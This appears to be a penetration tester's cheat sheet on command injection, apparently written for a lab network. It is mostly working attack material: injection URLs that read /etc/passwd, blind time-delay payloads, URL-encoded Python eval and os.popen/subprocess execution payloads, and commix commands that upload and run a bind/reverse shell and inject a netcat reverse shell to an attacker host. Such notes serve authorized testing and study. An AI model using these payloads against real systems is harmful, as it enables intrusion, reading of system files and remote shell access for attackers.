Command Injection

Concept:
	inject a seperate command into an existing command
	- & | and ; metacharacters can be used to join commands
	--when repeatable, acts like a non-interactive shell

TOOLS:
commix
webscarab
webgoat
burpsuite (scanner, repeater)

	
TYPES
Error-based
	commands are output to the screen
	e.g.
	http://10.11.1.1/cgi-bin/userData.pl?doc=/bin/ls|
	http://10.11.1.1/cgi-bin/userData.pl?dir=%3Bcat%20/etc/passwd
Blind
	returns no output, reliably detected by using time-delays
	--check raw response packet(s) for output (burp, zap, curl, wireshark, ff extensions)
	e.g.
	| ping -i 30 127.0.0.1 |
	| ping -n 30 127.0.0.1|
	& ping -i 30 127.0.0.1&
	&ping -n 30 127.0.0.1&
	;ping -i 30 127.0.0.1;
	%0a ping -i 30 127.0.0.1 %0a
	` ping 127.0.0.1

Python(blind)
example (unescaped) test payload
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
example (unescaped) execution payloads
eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))
param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
__import__('os').popen('COMMAND').read()
param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29
eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))
eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'COMMAND',shell=True)""",'','single'))
eval(compile("""__import__('os').popen(r'COMMAND').read();import time;time.sleep(2)""",'','single'))
Methods other than eval (advanced methods)
unpickle seriralized data passed by the user
invalid comparisons [unix]
e.g.
;str=1$(python -c "print len('KRZQFC')");if [ 6 != ${str1} ]; then $(python -c "import time;time.sleep(0)");else $(python -c "import time;time.sleep(1)")fi //


COMMIX USAGE
commix --url="http://10.11.1.1/path/uri.cgi
commix --url="http://10.11.1.1/path/uri.cgi?param=INJECT_HERE"
commix --url="http://10.11.1.1/path/uri.cgi?para=something&param=INJECT_HERE"
	-test command injection
commix --url="http://10.11.1.1/path/uri.cgi?param=INJECT_HERE" -a 
	-test command injection and try all host enumeration modules
commix --url="http://10.11.1.1/path/uri.cgi?param=INJECT_HERE" --file-write="/var/www/html/path/egg.py" --file-dest="/tmp/egg.py" --os-cmd="python egg.py"
	-upload and execute a bind/reverse shell
commix --url="http://10.11.1.1/path/uri.cgi?param=INJECT_HERE" --os-cmd="/usr/bin/nc -e /bin/sh 10.11.0.1 2345"
	-netcat reverse shell command inject

commix(os_shell) > reverse_tcp
commix(revese_tcp) > set LPORT 2345
	-commix netcat reverse shell (where available)
